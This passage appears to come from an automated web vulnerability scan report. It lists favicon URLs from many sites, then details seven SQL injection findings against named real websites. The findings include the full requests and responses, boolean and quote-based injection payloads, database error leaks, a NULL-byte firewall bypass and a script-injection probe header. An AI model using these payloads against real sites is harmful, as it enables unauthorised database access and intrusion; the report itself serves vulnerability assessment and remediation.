27.24. http://www.bluelightshoppers.com/favicon.ico

27.25. http://www.bodybody.com/favicon.ico

27.26. http://www.bofa.com/favicon.ico

27.27. http://www.boomersintheknow.com/favicon.ico

27.28. http://www.broadwaymusicalhome.com/favicon.ico

27.29. http://www.brookhavencollege.edu/favicon.ico

27.30. http://www.bulkpart.com/favicon.ico

27.31. http://www.byutv.org/favicon.ico

27.32. http://www.cabinkit.com/favicon.ico

27.33. http://www.camelcamelcamel.com/favicon.ico

27.34. http://www.carbsmart.com/favicon.ico

27.35. http://www.carfaxonline.com/favicon.ico

27.36. http://www.cccev.com/favicon.ico

27.37. http://www.celebros.com/favicon.ico

27.38. http://www.centralwisconsinstatefair.com/favicon.ico

27.39. http://www.chacousa.com/favicon.ico

27.40. http://www.chamberlain.edu/favicon.ico

27.41. http://www.chandleraz.gov/favicon.ico

27.42. http://www.chatstat.com/favicon.ico

27.43. http://www.checkdomain.com/favicon.ico

27.44. http://www.chiltonlibrary.com/favicon.ico

27.45. http://www.chitchatting.com/favicon.ico

27.46. http://www.citysports.com/favicon.ico

27.47. http://www.coastline.edu/favicon.ico

27.48. http://www.coffesshopreadin.com/favicon.ico

27.49. http://www.connerprairie.org/favicon.ico

27.50. http://www.connollyco.com/favicon.ico

27.51. http://www.coolstuffcheap.com/favicon.ico

27.52. http://www.cprr.org/favicon.ico

27.53. http://www.craigslist.ch/favicon.ico

27.54. http://www.craigslist.dk/favicon.ico

27.55. http://www.creditcard-loan-me.com/favicon.ico

27.56. http://www.crossdresser.com/favicon.ico

27.57. http://www.daelive.com/favicon.ico

27.58. http://www.dancehelp.com/favicon.ico

27.59. http://www.davenport.edu/favicon.ico

27.60. http://www.dcsportsfan.com/favicon.ico

27.61. http://www.dealerinventoryonline.com/favicon.ico

27.62. http://www.decoruniverse.com/favicon.ico

27.63. http://www.defensedevices.com/favicon.ico

27.64. http://www.desktopreview.com/favicon.ico

27.65. http://www.directgardening.com/favicon.ico

27.66. http://www.discountanimetoys.com/favicon.ico

27.67. http://www.discountdressup.com/favicon.ico

27.68. http://www.distinctive-decor.com/favicon.ico

27.69. http://www.dogthebountyhunter.com/favicon.ico

27.70. http://www.donath.org/favicon.ico

27.71. http://www.drivepetty.com/favicon.ico

27.72. http://www.emailbrain.com/favicon.ico

27.73. http://www.esc11.net/favicon.ico

27.74. http://www.ezcouponsearch.com/favicon.ico

27.75. http://www.fabsugar.co.uk/favicon.ico

27.76. http://www.factbites.com/favicon.ico

27.77. http://www.fangraphs.com/favicon.ico

27.78. http://www.fear.org/favicon.ico

27.79. http://www.fileflyer.com/favicon.ico

27.80. http://www.findacase.com/favicon.ico

27.81. http://www.flash-memory-store.com/favicon.ico

27.82. http://www.flashmaps.com/favicon.ico

27.83. http://www.focusedtechnology.com/favicon.ico

27.84. http://www.fsckmeet.com/favicon.ico

27.85. http://www.fuglyblog.com/favicon.ico

27.86. http://www.fxstreet.com/favicon.ico

27.87. http://www.germandeli.com/favicon.ico

27.88. http://www.globelifechildren.com/favicon.ico

27.89. http://www.goaliemonkey.com/favicon.ico

27.90. http://www.gospial.com/favicon.ico

27.91. http://www.gov.im/favicon.ico

27.92. http://www.guestcentric.net/favicon.ico

27.93. http://www.gunclips.net/favicon.ico

27.94. http://www.harvestessentials.com/favicon.ico

27.95. http://www.havahart.com/favicon.ico

27.96. http://www.helloboston.com/favicon.ico

27.97. http://www.hellonashville.com/favicon.ico

27.98. http://www.hellopittsburgh.com/favicon.ico

27.99. http://www.hiphopbling.com/favicon.ico

27.100. http://www.holyfragger.com/favicon.ico

27.101. http://www.horserentals.com/favicon.ico

27.102. http://www.houseofinks.com/favicon.ico

27.103. http://www.howtowritearesume.net/favicon.ico

27.104. http://www.hypster.com/favicon.ico

27.105. http://www.idcow.com/favicon.ico

27.106. http://www.ihirechefs.com/favicon.ico

27.107. http://www.ihirehr.com/favicon.ico

27.108. http://www.ihiremedtechs.com/favicon.ico

27.109. http://www.ihiresecurity.com/favicon.ico

27.110. http://www.incentiveusa.com/favicon.ico

27.111. http://www.inkcartridges.com/favicon.ico

27.112. http://www.insuranceleads.com/favicon.ico

27.113. http://www.insuremeonline.com/favicon.ico

27.114. http://www.jmetube.com/favicon.ico

27.115. http://www.jobinthebox.com/favicon.ico

27.116. http://www.jtcc.edu/favicon.ico

27.117. http://www.juststrings.net/favicon.ico

27.118. http://www.konicaminolta.com/favicon.ico

27.119. http://www.laborlawcenter.com/favicon.ico

27.120. http://www.lakegeorge.com/favicon.ico

27.121. http://www.lakesunbank.com/favicon.ico

27.122. http://www.leaguesecretary.com/favicon.ico

27.123. http://www.linkbuzzters.com/favicon.ico

27.124. http://www.littlethingsfavors.com/favicon.ico

27.125. http://www.liuna.org/favicon.ico

27.126. http://www.loehmanns.com/favicon.ico

27.127. http://www.lorenz.com/favicon.ico

27.128. http://www.madametussauds.com/favicon.ico

27.129. http://www.mahoningcountyoh.gov/favicon.ico

27.130. http://www.malaysiaairlines.com/favicon.ico

27.131. http://www.martialartsmart.com/favicon.ico

27.132. http://www.martinsfood.com/favicon.ico

27.133. http://www.mattycollector.com/favicon.ico

27.134. http://www.mininggazette.com/favicon.ico

27.135. http://www.modernbike.com/favicon.ico

27.136. http://www.monticellocatalog.org/favicon.ico

27.137. http://www.motostrano.com/favicon.ico

27.138. http://www.mouseonhouse.com/favicon.ico

27.139. http://www.mscmain.com/favicon.ico

27.140. http://www.mshsaa.org/favicon.ico

27.141. http://www.muddywaterpress.com/favicon.ico

27.142. http://www.myazcar.com/favicon.ico

27.143. http://www.myimager.com/favicon.ico

27.144. http://www.myknobs.com/favicon.ico

27.145. http://www.mylovecal.com/favicon.ico

27.146. http://www.myrealty.com/favicon.ico

27.147. http://www.namesandnumbers.com/favicon.ico

27.148. http://www.orgill.com/favicon.ico

27.149. http://www.osaa.org/favicon.ico

27.150. http://www.outletpc.com/favicon.ico

27.151. http://www.overthehillgifts.com/favicon.ico

27.152. http://www.pantherst.net/favicon.ico

27.153. http://www.paulgraham.com/favicon.ico

27.154. http://www.pba.com/favicon.ico

27.155. http://www.phonedetective.com/favicon.ico

27.156. http://www.piedmontng.com/favicon.ico

27.157. http://www.pillsburystore.com/favicon.ico

27.158. http://www.premium-home-realtors.com/favicon.ico

27.159. http://www.primechoiceautoparts.com/favicon.ico

27.160. http://www.prodirectsoccer.com/favicon.ico

27.161. http://www.protectyourhome.com/favicon.ico

27.162. http://www.purestorm.com/favicon.ico

27.163. http://www.racetrac.com/favicon.ico

27.164. http://www.racingusa.com/favicon.ico

27.165. http://www.read-4-cash.com/favicon.ico

27.166. http://www.readingclubos.com/favicon.ico

27.167. http://www.regency-fire.com/favicon.ico

27.168. http://www.rentdigs.com/favicon.ico

27.169. http://www.replyat.com/favicon.ico

27.170. http://www.respect-the-book.org/favicon.ico

27.171. http://www.restaurant-guide.com/favicon.ico

27.172. http://www.rmauctions.com/favicon.ico

27.173. http://www.santabarbara.com/favicon.ico

27.174. http://www.sccaforums.com/favicon.ico

27.175. http://www.scrapyourtrip.com/favicon.ico

27.176. http://www.sdbor.edu/favicon.ico

27.177. http://www.secondchancedegrees.com/favicon.ico

27.178. http://www.securityprousa.com/favicon.ico

27.179. http://www.sensoryedge.com/favicon.ico

27.180. http://www.sharmusic.com/favicon.ico

27.181. http://www.shavers-and-replacement-parts.com/favicon.ico

27.182. http://www.shopwildthings.com/favicon.ico

27.183. http://www.silversneakers.com/favicon.ico

27.184. http://www.simplesite.com/favicon.ico

27.185. http://www.simplykidsfurniture.com/favicon.ico

27.186. http://www.simplywhispersstore.com/favicon.ico

27.187. http://www.sitstay.com/favicon.ico

27.188. http://www.sky.it/favicon.ico

27.189. http://www.skyscape.com/favicon.ico

27.190. http://www.smarthunt.com/favicon.ico

27.191. http://www.smsd.org/favicon.ico

27.192. http://www.snapforseniors.com/favicon.ico

27.193. http://www.solar-electric.com/favicon.ico

27.194. http://www.speedwaymedia.com/favicon.ico

27.195. http://www.standardprocess.com/favicon.ico

27.196. http://www.standardpub.com/favicon.ico

27.197. http://www.starbatteries.com/favicon.ico

27.198. http://www.stenhouse.com/favicon.ico

27.199. http://www.streamlight.com/favicon.ico

27.200. http://www.supercasuals.com/favicon.ico

27.201. http://www.supplierlist.com/favicon.ico

27.202. http://www.tallshipwindy.com/favicon.ico

27.203. http://www.tartburners.com/favicon.ico

27.204. http://www.teeines.com/favicon.ico

27.205. http://www.theamcforum.com/favicon.ico

27.206. http://www.thecashteacher.com/favicon.ico

27.207. http://www.theignitionnetwork.com/favicon.ico

27.208. http://www.thememoryguide.com/favicon.ico

27.209. http://www.thepetstoreonline.com/favicon.ico

27.210. http://www.thetiebar.com/favicon.ico

27.211. http://www.thetotaltransformation.com/favicon.ico

27.212. http://www.thumbshots.com/favicon.ico

27.213. http://www.tirewarehouse.net/favicon.ico

27.214. http://www.touchlocal.com/favicon.ico

27.215. http://www.trcc.edu/favicon.ico

27.216. http://www.trimfabric.com/favicon.ico

27.217. http://www.tubedepot.com/favicon.ico

27.218. http://www.tv5.org/favicon.ico

27.219. http://www.ultimateberries.com/favicon.ico

27.220. http://www.unusualhotelsoftheworld.com/favicon.ico

27.221. http://www.utro.ru/favicon.ico

27.222. http://www.victorpest.com/favicon.ico

27.223. http://www.viva-media.com/favicon.ico

27.224. http://www.vlcmediaplayer-new.info/favicon.ico

27.225. http://www.washingtonlakes.com/favicon.ico

27.226. http://www.watchsologirls.com/favicon.ico

27.227. http://www.water.net/favicon.ico

27.228. http://www.wincfg.org/favicon.ico

27.229. http://www.xmlsweb.com/favicon.ico

27.230. http://www.yousearchpage.com/favicon.ico

28. Content type is not specified

28.1. http://www.3dkink.com/favicon.ico

28.2. http://www.asianfoodgrocer.com/favicon.ico

28.3. http://www.augsburgfortress.org/favicon.ico

28.4. http://www.biographicon.com/favicon.ico

28.5. http://www.bullionvault.com/favicon.ico

28.6. http://www.campbell.army.mil/favicon.ico

28.7. http://www.copaair.com/favicon.ico

28.8. http://www.doc2pdf.net/favicon.ico

28.9. http://www.domesticviolence.org/favicon.ico

28.10. http://www.eastman.com/favicon.ico

28.11. http://www.gosupermodel.com/favicon.ico

28.12. http://www.harman.com/favicon.ico

28.13. http://www.hrservicesinc.com/favicon.ico

28.14. http://www.icampmo.com/favicon.ico

28.15. http://www.kellerisd.net/favicon.ico

28.16. http://www.kernsheriff.com/favicon.ico

28.17. http://www.lakewood.cc/favicon.ico

28.18. http://www.marylandroads.com/favicon.ico

28.19. http://www.ncoa.org/favicon.ico

28.20. http://www.ohchr.org/favicon.ico

28.21. http://www.orencia.com/favicon.ico

28.22. http://www.parkview.com/favicon.ico

28.23. http://www.realsolutions.com/favicon.ico

28.24. http://www.schwansjobs.com/favicon.ico

28.25. http://www.sharpie.com/favicon.ico

28.26. http://www.tenethealth.com/favicon.ico

28.27. http://www.trybarillawholegrain.com/favicon.ico

28.28. http://www.unitedwayatlanta.org/favicon.ico

28.29. http://www.visitsaltlake.com/favicon.ico

28.30. http://www.yvcc.edu/favicon.ico

29. SSL certificate

29.1. https://desire2learn.uww.edu/

29.2. https://password.uww.edu/

29.3. https://post.uww.edu/

29.4. https://tickets.spac.org/

29.5. https://uwwins.uww.edu/



1. SQL injection  next
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.gehealthcare.com/favicon.ico [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.gehealthcare.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14334019'%20or%201%3d1--%20 and 14334019'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico14334019'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gehealthcare.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1 (redirected)

HTTP/1.1 500 Server Error
Server: GE Healthcare Web Server
Date: Wed, 04 May 2011 03:43:25 GMT
Content-type: text/plain
Content-Length: 379

HTTP/1.1 100 Continue


       <html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.amershambiosciences.com/APTRIX/upp01077.nsf/content/ten_percent">http://www.amershambiosciences.com/APTRIX/upp01077.nsf/content/ten_percent</a>.</p>
</body></html>

Request 2

GET /favicon.ico14334019'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gehealthcare.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2 (redirected)

HTTP/1.1 500 Server Error
Server: GE Healthcare Web Server
Date: Wed, 04 May 2011 03:43:26 GMT
Content-type: text/plain
Content-Length: 317

HTTP/1.1 100 Continue


       <html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.gehealthcare.com/helpcenter.html">http://www.gehealthcare.com/helpcenter.html</a>.</p>
</body></html>


1.2. http://www.next-episode.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.next-episode.net
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 18962190'%20or%201%3d1--%20 and 18962190'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico18962190'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.next-episode.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 301 Moved Permanently
Server: Exsisto
Date: Wed, 04 May 2011 01:18:34 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/4.4.9
Expires: Thu, 05 May 2011 01:18:34 GMT
Cache-Control: max-age=86400
Pragma: no-cache
Set-Cookie: PHPSESSID=5c47277356787bbbbb8835ff3b1c6128; path=/
location: http://next-episode.net
Vary: Accept-Encoding
Content-Length: 24891


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords" content="Will & Grace,download,download episodes,download season,series,tv series,series schedule,download tv,tv episode,episodes,season,series episode guide,tv series episodes,tv show,tv show episode,tv show episode guide,tv show season,episodes schedule,episode season,tv show series,tv shows">
<meta name="description" content="Next-Episode.Net is your reference guide to Will & Grace Show. Will & Grace episodes schedule, forums, downloads, polls, calendar and more.">
<meta name="google-site-verification" content="hBGPxEsADuNmjT0hpyQn4DBwjdVd8CabGQcWd08mQJc" />
<link href="/style.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/js/ajax/ajax_engine.js"></script>
<link rel="alternate" type="application/rss+xml" title="Next Episode News Feed" href="/rss_home.xml">
<link rel="shortcut icon" href="/favicon.ico" >
<title>Will & Grace TV Show - Download Will & Grace Episodes - Next-Episode.Net</title>
<link rel="image_src" href="http://next-episode.net/tv-show-image/favicon.ico18962190' or 1=1-- .jpg"></head>
<body>
<table width="960" border="0" align="center" cellpadding="0" cellspacing="0" class="main_table">
<tr>
<td height="25" colspan="2" align="left" valign="top" bgcolor="#ffffff"><table width="100%" border="0" cellspacing="0" cellpadding="0" id="header">
<tr>
<td width="81%" valign="bottom" class="td4"> <form name="
...[SNIP]...

Request 2

GET /favicon.ico18962190'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.next-episode.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 404 Not Found
Server: Exsisto
Date: Wed, 04 May 2011 01:18:36 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=9957ce01105f3d91329431af544881df; path=/
location: http://next-episode.net
Vary: Accept-Encoding
Content-Length: 51

Sorry. The url you are looking for is non existent.

1.3. http://www.spac.org/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spac.org
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.spac.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109962183.1304490783.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utma=109962183.2070296370.1304490783.1304490783.1304490783.1; __utmc=109962183; __utmb=109962183.1.10.1304490783

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:36:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...
</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.spac.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109962183.1304490783.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utma=109962183.2070296370.1304490783.1304490783.1304490783.1; __utmc=109962183; __utmb=109962183.1.10.1304490783

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:36:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...

1.4. http://www.spac.org/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spac.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.spac.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:08:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...
</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.spac.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:08:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...

1.5. http://www.themonroetimes.com/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themonroetimes.com
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3'
Host: www.themonroetimes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 500 Internal Server Error
Date: Wed, 04 May 2011 01:55:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 384
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQABSDRQ=IAHMAOEANGBEDALJIAHOIAHB; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft SQL Native Client</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark after the character string 'curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 openssl/0.9.8o zlib/1.2.3''.</font>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3''
Host: www.themonroetimes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 404
Date: Wed, 04 May 2011 01:55:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2414
Content-Type: text/html
Set-Cookie: UID=16606079; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: UserPollID=0; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSQABSDRQ=KAHMAOEAFNCGHCNFEMKAHHNC; path=/
Cache-control: private


<html>
<head>
<title>Page Not Found - The Monroe Times</title>
<style type="text/css">
#goog-wm
{
color:#000000;
   font-fami
...[SNIP]...

1.6. http://www.uiccu.org/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.uiccu.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uiccu.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:52:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uiccu.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 00:52:03 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 209

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

1.7. http://www.zdf.de/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.zdf.de
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /favicon.ico%00' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zdf.de
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 504 Gateway Time-out
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Wed, 04 May 2011 01:20:18 GMT
Content-Type: text/html
Content-Length: 772
Expires: Wed, 04 May 2011 01:20:18 GMT
Connection: keep-alive

<HTML><HEAD>
<TITLE>ERROR: The requested URL could not be retrieved</TITLE>
</HEAD><BODY>
<H1>ERROR</H1>
<H2>The requested URL could not be retrieved</H2>
<HR>
<P>
While trying to retrieve the request
...[SNIP]...

Request 2

GET /favicon.ico%00'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zdf.de
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 417 Expectation failed
Content-Length: 1026
Content-Type: text/html
Server: squid
X-Cache: MISS from www.zdf.de
X-Squid-Error: ERR_INVALID_REQ 0
Date: Wed, 04 May 2011 01:20:19 GMT
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...

2. ASP.NET tracing enabled  previous  next
There are 5 instances of this issue:

Issue background

ASP.NET tracing is a debugging feature which is designed for use during development to help troubleshoot problems. It discloses sensitive information to users, and if enabled in production contexts may present a serious security threat.

